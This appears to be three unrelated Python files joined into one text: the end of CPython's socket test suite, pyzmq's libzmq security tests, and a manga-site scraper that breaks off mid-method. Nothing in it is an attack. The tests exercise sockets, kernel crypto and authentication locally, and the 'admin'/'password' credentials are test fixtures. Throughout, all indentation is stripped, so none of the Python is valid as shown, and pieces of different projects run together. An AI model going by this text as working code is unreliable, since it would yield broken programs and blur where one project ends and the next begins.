conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count + offset
def _testCountWithOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 100007
meth = self.meth_from_sock(sock)
sent = meth(file, offset=2007, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count + 2007)
def testCountWithOffset(self):
count = 100007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[2007:count+2007])
# non blocking sockets are not supposed to work
def _testNonBlocking(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
sock.setblocking(False)
meth = self.meth_from_sock(sock)
self.assertRaises(ValueError, meth, file)
self.assertRaises(ValueError, sock.sendfile, file)
def testNonBlocking(self):
conn = self.accept_conn()
if conn.recv(8192):
self.fail('was not supposed to receive any data')
# timeout (non-triggered)
def _testWithTimeout(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
sock = socket.create_connection(address,
timeout=support.LOOPBACK_TIMEOUT)
with sock, file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
def testWithTimeout(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# timeout (triggered)
def _testWithTimeoutTriggeredSend(self):
address = self.serv.getsockname()
with open(support.TESTFN, 'rb') as file:
with socket.create_connection(address) as sock:
sock.settimeout(0.01)
meth = self.meth_from_sock(sock)
self.assertRaises(socket.timeout, meth, file)
def testWithTimeoutTriggeredSend(self):
conn = self.accept_conn()
conn.recv(88192)
# errors
def _test_errors(self):
pass
def test_errors(self):
with open(support.TESTFN, 'rb') as file:
with socket.socket(type=socket.SOCK_DGRAM) as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "SOCK_STREAM", meth, file)
with open(support.TESTFN, 'rt') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "binary mode", meth, file)
with open(support.TESTFN, 'rb') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count='2')
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count=0.1)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=0)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=-1)
@unittest.skipUnless(hasattr(os, "sendfile"),
'os.sendfile() required for this test.')
class SendfileUsingSendfileTest(SendfileUsingSendTest):
"""
Test the sendfile() implementation of socket.sendfile().
"""
def meth_from_sock(self, sock):
return getattr(sock, "_sendfile_use_sendfile")
@unittest.skipUnless(HAVE_SOCKET_ALG, 'AF_ALG required')
class LinuxKernelCryptoAPI(unittest.TestCase):
# tests for AF_ALG
def create_alg(self, typ, name):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
try:
sock.bind((typ, name))
except FileNotFoundError as e:
# type / algorithm is not available
sock.close()
raise unittest.SkipTest(str(e), typ, name)
else:
return sock
# bpo-31705: On kernel older than 4.5, sendto() failed with ENOKEY,
# at least on ppc64le architecture
@support.requires_linux_version(4, 5)
def test_sha256(self):
expected = bytes.fromhex("ba7816bf8f01cfea414140de5dae2223b00361a396"
"177a9cb410ff61f20015ad")
with self.create_alg('hash', 'sha256') as algo:
op, _ = algo.accept()
with op:
op.sendall(b"abc")
self.assertEqual(op.recv(512), expected)
op, _ = algo.accept()
with op:
op.send(b'a', socket.MSG_MORE)
op.send(b'b', socket.MSG_MORE)
op.send(b'c', socket.MSG_MORE)
op.send(b'')
self.assertEqual(op.recv(512), expected)
def test_hmac_sha1(self):
expected = bytes.fromhex("effcdf6ae5eb2fa2d27416d5f184df9c259a7c79")
with self.create_alg('hash', 'hmac(sha1)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, b"Jefe")
op, _ = algo.accept()
with op:
op.sendall(b"what do ya want for nothing?")
self.assertEqual(op.recv(512), expected)
# Although it should work with 3.19 and newer the test blocks on
# Ubuntu 15.10 with Kernel 4.2.0-19.
@support.requires_linux_version(4, 3)
def test_aes_cbc(self):
key = bytes.fromhex('06a9214036b8a15b512e03d534120006')
iv = bytes.fromhex('3dafba429d9eb430b422da802c9fac41')
msg = b"Single block msg"
ciphertext = bytes.fromhex('e353779c1079aeb82708942dbe77181a')
msglen = len(msg)
with self.create_alg('skcipher', 'cbc(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
flags=socket.MSG_MORE)
op.sendall(msg)
self.assertEqual(op.recv(msglen), ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([ciphertext],
op=socket.ALG_OP_DECRYPT, iv=iv)
self.assertEqual(op.recv(msglen), msg)
# long message
multiplier = 1024
longmsg = [msg] * multiplier
op, _ = algo.accept()
with op:
op.sendmsg_afalg(longmsg,
op=socket.ALG_OP_ENCRYPT, iv=iv)
enc = op.recv(msglen * multiplier)
self.assertEqual(len(enc), msglen * multiplier)
self.assertEqual(enc[:msglen], ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([enc],
op=socket.ALG_OP_DECRYPT, iv=iv)
dec = op.recv(msglen * multiplier)
self.assertEqual(len(dec), msglen * multiplier)
self.assertEqual(dec, msg * multiplier)
@support.requires_linux_version(4, 9) # see issue29324
def test_aead_aes_gcm(self):
key = bytes.fromhex('c939cc13397c1d37de6ae0e1cb7c423c')
iv = bytes.fromhex('b3d8cc017cbb89b39e0f67e2')
plain = bytes.fromhex('c3b3c41f113a31b73d9a5cd432103069')
assoc = bytes.fromhex('24825602bd12a984e0092d3e448eda5f')
expected_ct = bytes.fromhex('93fe7d9e9bfd10348a5606e5cafa7354')
expected_tag = bytes.fromhex('0032a1dc85f1c9786925a2e71d8272dd')
taglen = len(expected_tag)
assoclen = len(assoc)
with self.create_alg('aead', 'gcm(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE,
None, taglen)
# send assoc, plain and tag buffer in separate steps
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen, flags=socket.MSG_MORE)
op.sendall(assoc, socket.MSG_MORE)
op.sendall(plain)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# now with msg
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg_afalg([msg], op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# create anc data manually
pack_uint32 = struct.Struct('I').pack
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg(
[msg],
([socket.SOL_ALG, socket.ALG_SET_OP, pack_uint32(socket.ALG_OP_ENCRYPT)],
[socket.SOL_ALG, socket.ALG_SET_IV, pack_uint32(len(iv)) + iv],
[socket.SOL_ALG, socket.ALG_SET_AEAD_ASSOCLEN, pack_uint32(assoclen)],
)
)
res = op.recv(len(msg) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# decrypt and verify
op, _ = algo.accept()
with op:
msg = assoc + expected_ct + expected_tag
op.sendmsg_afalg([msg], op=socket.ALG_OP_DECRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(len(msg) - taglen)
self.assertEqual(plain, res[assoclen:])
@support.requires_linux_version(4, 3) # see test_aes_cbc
def test_drbg_pr_sha256(self):
# deterministic random bit generator, prediction resistance, sha256
with self.create_alg('rng', 'drbg_pr_sha256') as algo:
extra_seed = os.urandom(32)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, extra_seed)
op, _ = algo.accept()
with op:
rn = op.recv(32)
self.assertEqual(len(rn), 32)
def test_sendmsg_afalg_args(self):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
with sock:
with self.assertRaises(TypeError):
sock.sendmsg_afalg()
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(1)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=-1)
def test_length_restriction(self):
# bpo-35050, off-by-one error in length check
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
self.addCleanup(sock.close)
# salg_type[14]
with self.assertRaises(FileNotFoundError):
sock.bind(("t" * 13, "name"))
with self.assertRaisesRegex(ValueError, "type too long"):
sock.bind(("t" * 14, "name"))
# salg_name[64]
with self.assertRaises(FileNotFoundError):
sock.bind(("type", "n" * 63))
with self.assertRaisesRegex(ValueError, "name too long"):
sock.bind(("type", "n" * 64))
@unittest.skipUnless(sys.platform.startswith("win"), "requires Windows")
class TestMSWindowsTCPFlags(unittest.TestCase):
knownTCPFlags = {
# available since long time ago
'TCP_MAXSEG',
'TCP_NODELAY',
# available starting with Windows 10 1607
'TCP_FASTOPEN',
# available starting with Windows 10 1703
'TCP_KEEPCNT',
# available starting with Windows 10 1709
'TCP_KEEPIDLE',
'TCP_KEEPINTVL'
}
def test_new_tcp_flags(self):
provided = [s for s in dir(socket) if s.startswith('TCP')]
unknown = [s for s in provided if s not in self.knownTCPFlags]
self.assertEqual([], unknown,
"New TCP flags were discovered. See bpo-32394 for more information")
class CreateServerTest(unittest.TestCase):
def test_address(self):
port = socket_helper.find_unused_port()
with socket.create_server(("127.0.0.1", port)) as sock:
self.assertEqual(sock.getsockname()[0], "127.0.0.1")
self.assertEqual(sock.getsockname()[1], port)
if socket_helper.IPV6_ENABLED:
with socket.create_server(("::1", port),
family=socket.AF_INET6) as sock:
self.assertEqual(sock.getsockname()[0], "::1")
self.assertEqual(sock.getsockname()[1], port)
def test_family_and_type(self):
with socket.create_server(("127.0.0.1", 0)) as sock:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
if socket_helper.IPV6_ENABLED:
with socket.create_server(("::1", 0), family=socket.AF_INET6) as s:
self.assertEqual(s.family, socket.AF_INET6)
self.assertEqual(sock.type, socket.SOCK_STREAM)
def test_reuse_port(self):
if not hasattr(socket, "SO_REUSEPORT"):
with self.assertRaises(ValueError):
socket.create_server(("localhost", 0), reuse_port=True)
else:
with socket.create_server(("localhost", 0)) as sock:
opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
self.assertEqual(opt, 0)
with socket.create_server(("localhost", 0), reuse_port=True) as sock:
opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
self.assertNotEqual(opt, 0)
@unittest.skipIf(not hasattr(_socket, 'IPPROTO_IPV6') or
not hasattr(_socket, 'IPV6_V6ONLY'),
"IPV6_V6ONLY option not supported")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test_ipv6_only_default(self):
with socket.create_server(("::1", 0), family=socket.AF_INET6) as sock:
assert sock.getsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY)
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test_dualstack_ipv6_family(self):
with socket.create_server(("::1", 0), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.assertEqual(sock.family, socket.AF_INET6)
class CreateServerFunctionalTest(unittest.TestCase):
timeout = support.LOOPBACK_TIMEOUT
def setUp(self):
self.thread = None
def tearDown(self):
if self.thread is not None:
self.thread.join(self.timeout)
def echo_server(self, sock):
def run(sock):
with sock:
conn, _ = sock.accept()
with conn:
event.wait(self.timeout)
msg = conn.recv(1024)
if not msg:
return
conn.sendall(msg)
event = threading.Event()
sock.settimeout(self.timeout)
self.thread = threading.Thread(target=run, args=(sock, ))
self.thread.start()
event.set()
def echo_client(self, addr, family):
with socket.socket(family=family) as sock:
sock.settimeout(self.timeout)
sock.connect(addr)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
def test_tcp4(self):
port = socket_helper.find_unused_port()
with socket.create_server(("", port)) as sock:
self.echo_server(sock)
self.echo_client(("127.0.0.1", port), socket.AF_INET)
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test_tcp6(self):
port = socket_helper.find_unused_port()
with socket.create_server(("", port),
family=socket.AF_INET6) as sock:
self.echo_server(sock)
self.echo_client(("::1", port), socket.AF_INET6)
# --- dual stack tests
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test_dual_stack_client_v4(self):
port = socket_helper.find_unused_port()
with socket.create_server(("", port), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.echo_server(sock)
self.echo_client(("127.0.0.1", port), socket.AF_INET)
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test_dual_stack_client_v6(self):
port = socket_helper.find_unused_port()
with socket.create_server(("", port), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.echo_server(sock)
self.echo_client(("::1", port), socket.AF_INET6)
@requireAttrs(socket, "send_fds")
@requireAttrs(socket, "recv_fds")
@requireAttrs(socket, "AF_UNIX")
class SendRecvFdsTests(unittest.TestCase):
def testSendAndRecvFds(self):
def close_pipes(pipes):
for fd1, fd2 in pipes:
os.close(fd1)
os.close(fd2)
def close_fds(fds):
for fd in fds:
os.close(fd)
# send 10 file descriptors
pipes = [os.pipe() for _ in range(10)]
self.addCleanup(close_pipes, pipes)
fds = [rfd for rfd, wfd in pipes]
# use a UNIX socket pair to exchange file descriptors locally
sock1, sock2 = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)
with sock1, sock2:
socket.send_fds(sock1, [MSG], fds)
# request more data and file descriptors than expected
msg, fds2, flags, addr = socket.recv_fds(sock2, len(MSG) * 2, len(fds) * 2)
self.addCleanup(close_fds, fds2)
self.assertEqual(msg, MSG)
self.assertEqual(len(fds2), len(fds))
self.assertEqual(flags, 0)
# don't test addr
# test that file descriptors are connected
for index, fds in enumerate(pipes):
rfd, wfd = fds
os.write(wfd, str(index).encode())
for index, rfd in enumerate(fds2):
data = os.read(rfd, 100)
self.assertEqual(data, str(index).encode())
def test_main():
tests = [GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest,
UDPTimeoutTest, CreateServerTest, CreateServerFunctionalTest,
SendRecvFdsTests]
tests.extend([
NonBlockingTCPTests,
FileObjectClassTestCase,
UnbufferedFileObjectClassTestCase,
LineBufferedFileObjectClassTestCase,
SmallBufferedFileObjectClassTestCase,
UnicodeReadFileObjectClassTestCase,
UnicodeWriteFileObjectClassTestCase,
UnicodeReadWriteFileObjectClassTestCase,
NetworkConnectionNoServer,
NetworkConnectionAttributesTest,
NetworkConnectionBehaviourTest,
ContextManagersTest,
InheritanceTest,
NonblockConstantTest
])
tests.append(BasicSocketPairTest)
tests.append(TestUnixDomain)
tests.append(TestLinuxAbstractNamespace)
tests.extend([TIPCTest, TIPCThreadableTest])
tests.extend([BasicCANTest, CANTest])
tests.extend([BasicRDSTest, RDSTest])
tests.append(LinuxKernelCryptoAPI)
tests.append(BasicQIPCRTRTest)
tests.extend([
BasicVSOCKTest,
ThreadedVSOCKSocketStreamTest,
])
tests.append(BasicBluetoothTest)
tests.extend([
CmsgMacroTests,
SendmsgUDPTest,
RecvmsgUDPTest,
RecvmsgIntoUDPTest,
SendmsgUDP6Test,
RecvmsgUDP6Test,
RecvmsgRFC3542AncillaryUDP6Test,
RecvmsgIntoRFC3542AncillaryUDP6Test,
RecvmsgIntoUDP6Test,
SendmsgUDPLITETest,
RecvmsgUDPLITETest,
RecvmsgIntoUDPLITETest,
SendmsgUDPLITE6Test,
RecvmsgUDPLITE6Test,
RecvmsgRFC3542AncillaryUDPLITE6Test,
RecvmsgIntoRFC3542AncillaryUDPLITE6Test,
RecvmsgIntoUDPLITE6Test,
SendmsgTCPTest,
RecvmsgTCPTest,
RecvmsgIntoTCPTest,
SendmsgSCTPStreamTest,
RecvmsgSCTPStreamTest,
RecvmsgIntoSCTPStreamTest,
SendmsgUnixStreamTest,
RecvmsgUnixStreamTest,
RecvmsgIntoUnixStreamTest,
RecvmsgSCMRightsStreamTest,
RecvmsgIntoSCMRightsStreamTest,
# These are slow when setitimer() is not available
InterruptedRecvTimeoutTest,
InterruptedSendTimeoutTest,
TestSocketSharing,
SendfileUsingSendTest,
SendfileUsingSendfileTest,
])
tests.append(TestMSWindowsTCPFlags)
thread_info = support.threading_setup()
support.run_unittest(*tests)
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
test_security.py
|
"""Test libzmq security (libzmq >= 3.3.0)"""
# -*- coding: utf8 -*-
# Copyright (C) PyZMQ Developers
# Distributed under the terms of the Modified BSD License.
import os
import contextlib
import time
from threading import Thread
import zmq
from zmq.tests import (
BaseZMQTestCase, SkipTest, PYPY
)
from zmq.utils import z85
USER = b"admin"
PASS = b"password"
class TestSecurity(BaseZMQTestCase):
def setUp(self):
if zmq.zmq_version_info() < (4,0):
raise SkipTest("security is new in libzmq 4.0")
try:
zmq.curve_keypair()
except zmq.ZMQError:
raise SkipTest("security requires libzmq to be built with CURVE support")
super(TestSecurity, self).setUp()
def zap_handler(self):
socket = self.context.socket(zmq.REP)
socket.bind("inproc://zeromq.zap.01")
try:
msg = self.recv_multipart(socket)
version, sequence, domain, address, identity, mechanism = msg[:6]
if mechanism == b'PLAIN':
username, password = msg[6:]
elif mechanism == b'CURVE':
key = msg[6]
self.assertEqual(version, b"1.0")
self.assertEqual(identity, b"IDENT")
reply = [version, sequence]
if mechanism == b'CURVE' or \
(mechanism == b'PLAIN' and username == USER and password == PASS) or \
(mechanism == b'NULL'):
reply.extend([
b"200",
b"OK",
b"anonymous",
b"\5Hello\0\0\0\5World",
])
else:
reply.extend([
b"400",
b"Invalid username or password",
b"",
b"",
])
socket.send_multipart(reply)
finally:
socket.close()
@contextlib.contextmanager
def zap(self):
self.start_zap()
time.sleep(0.5) # allow time for the Thread to start
try:
yield
finally:
self.stop_zap()
def start_zap(self):
self.zap_thread = Thread(target=self.zap_handler)
self.zap_thread.start()
def stop_zap(self):
self.zap_thread.join()
def bounce(self, server, client, test_metadata=True):
msg = [os.urandom(64), os.urandom(64)]
client.send_multipart(msg)
frames = self.recv_multipart(server, copy=False)
recvd = list(map(lambda x: x.bytes, frames))
try:
if test_metadata and not PYPY:
for frame in frames:
self.assertEqual(frame.get('User-Id'), 'anonymous')
self.assertEqual(frame.get('Hello'), 'World')
self.assertEqual(frame['Socket-Type'], 'DEALER')
except zmq.ZMQVersionError:
pass
self.assertEqual(recvd, msg)
server.send_multipart(recvd)
msg2 = self.recv_multipart(client)
self.assertEqual(msg2, msg)
def test_null(self):
"""test NULL (default) security"""
server = self.socket(zmq.DEALER)
client = self.socket(zmq.DEALER)
self.assertEqual(client.MECHANISM, zmq.NULL)
self.assertEqual(server.mechanism, zmq.NULL)
self.assertEqual(client.plain_server, 0)
self.assertEqual(server.plain_server, 0)
iface = 'tcp://127.0.0.1'
port = server.bind_to_random_port(iface)
client.connect("%s:%i" % (iface, port))
self.bounce(server, client, False)
def test_plain(self):
"""test PLAIN authentication"""
server = self.socket(zmq.DEALER)
server.identity = b'IDENT'
client = self.socket(zmq.DEALER)
self.assertEqual(client.plain_username, b'')
self.assertEqual(client.plain_password, b'')
client.plain_username = USER
client.plain_password = PASS
self.assertEqual(client.getsockopt(zmq.PLAIN_USERNAME), USER)
self.assertEqual(client.getsockopt(zmq.PLAIN_PASSWORD), PASS)
self.assertEqual(client.plain_server, 0)
self.assertEqual(server.plain_server, 0)
server.plain_server = True
self.assertEqual(server.mechanism, zmq.PLAIN)
self.assertEqual(client.mechanism, zmq.PLAIN)
assert not client.plain_server
assert server.plain_server
with self.zap():
iface = 'tcp://127.0.0.1'
port = server.bind_to_random_port(iface)
client.connect("%s:%i" % (iface, port))
self.bounce(server, client)
def skip_plain_inauth(self):
"""test PLAIN failed authentication"""
server = self.socket(zmq.DEALER)
server.identity = b'IDENT'
client = self.socket(zmq.DEALER)
self.sockets.extend([server, client])
client.plain_username = USER
client.plain_password = b'incorrect'
server.plain_server = True
self.assertEqual(server.mechanism, zmq.PLAIN)
self.assertEqual(client.mechanism, zmq.PLAIN)
with self.zap():
iface = 'tcp://127.0.0.1'
port = server.bind_to_random_port(iface)
client.connect("%s:%i" % (iface, port))
client.send(b'ping')
server.rcvtimeo = 250
self.assertRaisesErrno(zmq.EAGAIN, server.recv)
def test_keypair(self):
"""test curve_keypair"""
try:
public, secret = zmq.curve_keypair()
except zmq.ZMQError:
raise SkipTest("CURVE unsupported")
self.assertEqual(type(secret), bytes)
self.assertEqual(type(public), bytes)
self.assertEqual(len(secret), 40)
self.assertEqual(len(public), 40)
# verify that it is indeed Z85
bsecret, bpublic = [ z85.decode(key) for key in (public, secret) ]
self.assertEqual(type(bsecret), bytes)
self.assertEqual(type(bpublic), bytes)
self.assertEqual(len(bsecret), 32)
self.assertEqual(len(bpublic), 32)
def test_curve_public(self):
"""test curve_public"""
try:
public, secret = zmq.curve_keypair()
except zmq.ZMQError:
raise SkipTest("CURVE unsupported")
if zmq.zmq_version_info() < (4,2):
raise SkipTest("curve_public is new in libzmq 4.2")
derived_public = zmq.curve_public(secret)
self.assertEqual(type(derived_public), bytes)
self.assertEqual(len(derived_public), 40)
# verify that it is indeed Z85
bpublic = z85.decode(derived_public)
self.assertEqual(type(bpublic), bytes)
self.assertEqual(len(bpublic), 32)
# verify that it is equal to the known public key
self.assertEqual(derived_public, public)
def test_curve(self):
"""test CURVE encryption"""
server = self.socket(zmq.DEALER)
server.identity = b'IDENT'
client = self.socket(zmq.DEALER)
self.sockets.extend([server, client])
try:
server.curve_server = True
except zmq.ZMQError as e:
# will raise EINVAL if no CURVE support
if e.errno == zmq.EINVAL:
raise SkipTest("CURVE unsupported")
server_public, server_secret = zmq.curve_keypair()
client_public, client_secret = zmq.curve_keypair()
server.curve_secretkey = server_secret
server.curve_publickey = server_public
client.curve_serverkey = server_public
client.curve_publickey = client_public
client.curve_secretkey = client_secret
self.assertEqual(server.mechanism, zmq.CURVE)
self.assertEqual(client.mechanism, zmq.CURVE)
self.assertEqual(server.get(zmq.CURVE_SERVER), True)
self.assertEqual(client.get(zmq.CURVE_SERVER), False)
with self.zap():
iface = 'tcp://127.0.0.1'
port = server.bind_to_random_port(iface)
client.connect("%s:%i" % (iface, port))
self.bounce(server, client)
|
__init__.py
|
# -*- coding: utf8 -*-
# Copyright (c) 2010-2017, Jamaludin Ahmad
# Released subject to the MIT License.
# Please see http://en.wikipedia.org/wiki/MIT_License
import os
import re
import sys
from collections import namedtuple
from queue import Queue
from threading import Semaphore, Thread
from urllib.parse import urljoin, urlparse
from zipfile import ZIP_DEFLATED, ZipFile
import requests
from lxml import html
Chapter = namedtuple('Chapter', 'number name url')
Page = namedtuple('Page', 'name url')
class MangaException(Exception):
"""Exception class for manga"""
pass
class GetManga(object):
def __init__(self, site, title):
self.concurrency = 4
self.path = '.'
self.title = title
self.manga = SITES[site](title)
@property
def chapters(self):
"""Show a list of available chapters"""
return self.manga.chapters
@property
def latest(self):
"""Show last available chapter"""
return self.manga.chapters[-1]
def get(self, chapter):
"""Downloads manga chapter as cbz archive"""
path = os.path.expanduser(self.path)
if not os.path.isdir(path):
try:
os.makedirs(path)
except OSError as msg:
raise MangaException(msg)
cbz_name = chapter.name + os.path.extsep + 'cbz'
cbz_file = os.path.join(path, cbz_name)
if os.path.isfile(cbz_file):
sys.stdout.write("file {0} exist, skipped download\n".format(cbz_name))
return
cbz_tmp = '{0}.tmp'.format(cbz_file)
try:
cbz = ZipFile(cbz_tmp, mode='w', compression=ZIP_DEFLATED)
except IOError as msg:
raise MangaException(msg)
sys.stdout.write("downloading {0} {1}:\n".format(self.title, chapter.number))
pages = self.manga.get_pages(chapter.url)
progress(0, len(pages))
threads = []
semaphore = Semaphore(self.concurrency)
queue = Queue()
for page in pages:
thread = Thread(target=self._get_image, args=(semaphore, queue, page))
thread.daemon = True
thread.start()
threads.append(thread)
try:
for thread in threads:
thread.join()
name, image = queue.get()
if not name:
raise MangaException(image)
cbz.writestr(name, image)
progress(len(cbz.filelist), len(pages))
except Exception as msg:
cbz.close()
os.remove(cbz_tmp)
raise MangaException(msg)
else:
cbz.close()
os.rename(cbz_tmp, cbz_file)
def _get_image(self, semaphore, queue, page):
"""Downloads page images inside a thread"""
try:
semaphore.acquire()
url = self.manga.get_image_url(page.url)
image_ext = urlparse(url).path.split('.')[-1]
name = page.name + os.path.extsep + image_ext
image = self.manga.download(url)
except MangaException as msg:
queue.put((None, msg))
else:
queue.put((name, image))
finally:
semaphore.release()
class MangaSite(object):
site_url = None
# all but mangareader uses descending chapter list
descending_list = True
_chapters_css = None
_pages_css = None
_image_css = None
def __init__(self, title):
# all sites only use lowercase title on their urls.
self.input_title = title.strip().lower()
@property
def title(self):
"""Returns the right manga title from user input"""
# combination of alphanumeric and underscore only is the most used format.
# used by: mangafox, mangastream, mangahere, mangatown
return re.sub(r'[^a-z0-9]+', '_', re.sub(r'^[^a-z0-9]+|[^a-z0-9]+$', '', self.input_title))
@property
def title_url(self):
"""Returns the index page's url of manga title"""
# this is the most common url for manga title
# used by: mangafox, mangastream, mangahere, mangatown
return "{0}/manga/{1}/".format(self.site_url, self.title)
@property
def chapters(self):
"""Returns available chapters"""
content = urlopen(self.title_url).text
doc = html.fromstring(content)
_chapters = doc.cssselect(self._chapters_css)
if self.descending_list:
_chapters = reversed(_chapters)
chapters = []
for _chapter in _chapters:
number = self._get_chapter_number(_chapter)
location = _chapter.get('href')
name = self._get_chapter_name(str(number), location)
url = self._get_chapter_url(location)
chapters.append(Chapter(number, name, url))
if not chapters:
raise MangaException("There is no chapter available.")
return chapters
def get_pages(self, chapter_url):
"""Returns a list of available pages of a chapter"""
content = urlopen(chapter_url).text
doc = html.fromstring(content)
_pages = doc.cssselect(self._pages_css)
pages = []
for _page in _pages:
name = self._get_page_name(_page.text)
if not name:
continue
url = self._get_page_url(chapter_url, name)
pages.append(Page(name, url))
return pages
def get_image_url(self, page_url):
"""Returns url of image from a chapter page"""
content = urlopen(page_url).text
doc = html.fromstring(content)
image_url = doc.cssselect(self._image_css)[0].get('src')
return urljoin(self.site_url, image_url)
@staticmethod
def download(image_url):
"""download manga's image"""
return urlopen(image_url).content
@staticmethod
def _get_chapter_number(chapter):
"""Returns chapter's number from a chapter's HtmlElement"""
# the most common one is getting the last word from a href section.
# used by: mangafox, mangahere, mangareader, mangatown
return chapter.text.strip().split(' ')[-1]
def _get_chapter_name(self, number, location):
"""Returns the appropriate name for the chapter for achive name"""
return "{0}_c{1}".format(self.title, number.zfill(3))
def _get_chapter_url(self, location):
"""Returns absolute url of chapter's page from location"""
return urljoin(self.site_url, location)
@staticmethod
def _get_page_name(page_text):
"""Returns page name from text available or None if it's not a valid page"""
# typical name: page's number, double page (eg. 10-11), or credits
# normally page listing from each chapter only has it's name in it, but..
# - mangafox has comment section
# - mangatown & mangahere has advertisement on featured page.
if page_text == 'Featured':
return None
return page_text
@staticmethod
def _get_page_url(chapter_url, page_name):
"""Returns manga image page url"""
# every sites use different format for their urls, this is a sample.
# used by: mangahere, mangatown
return "{0}{1}.html".format(chapter_url, page_name)
class MangaHere(MangaSite):
"""class for mangahere site"""
site_url = "http://www.mangahere.cc"
_chapters_css = "div.detail_list ul li a"
_pages_css = "section.readpage_top div.go_page select option"
_image_css = "img#image"
class MangaTown(MangaSite):
"""class for mangatown site"""
site_url = "http://www.mangatown.com"
_chapters_css = "div.chapter_content ul.chapter_list li a"
_pages_css = "div.manga_read_footer div.page_select select option"
_image_css = "img#image"
class MangaFox(MangaSite):
"""class for mangafox site"""
# their slogan should be: "we are not the best, but we are the first"
site_url = "http://mangafox.la"
_chapters_css = "a.tips"
_pages_css = "#top_bar option"
_image_css = "img#image"
@staticmethod
def _get_page_name(page_text):
"""Returns page name from text available"""
# mangafox has comments section in it's page listing
if page_text == 'Comments':
return None
return page_text
@staticmethod
def _get_page_url(chapter_url, page_name):
"""Returns manga image page url"""
# chapter's page already has the first page's name in it.
return re.sub(r'[0-9]+.html$', "{0}.html".format(page_name), chapter_url)
class MangaStream(MangaSite):
"""class for mangastream site"""
# a real scanlation group, not distro sites like the others here,
# currently doesn't utilize _get_page_name and override get_pages instead.
site_url = "https://readms.net"
_chapters_css = "td a"
_pages_css = "div.btn-group ul.dropdown-menu li a"
_image_css = "img#manga-page"
def get_pages(self, chapter_url):
"""Returns a list of available pages of a chapter"""
content = urlopen(chapter_url).text
doc = html.fromstring(content)
_pages = doc.cssselect(self._pages_css)
for _page in _pages:
page_text = _page.text
if not page_text:
continue
if 'Last Page' in page_text:
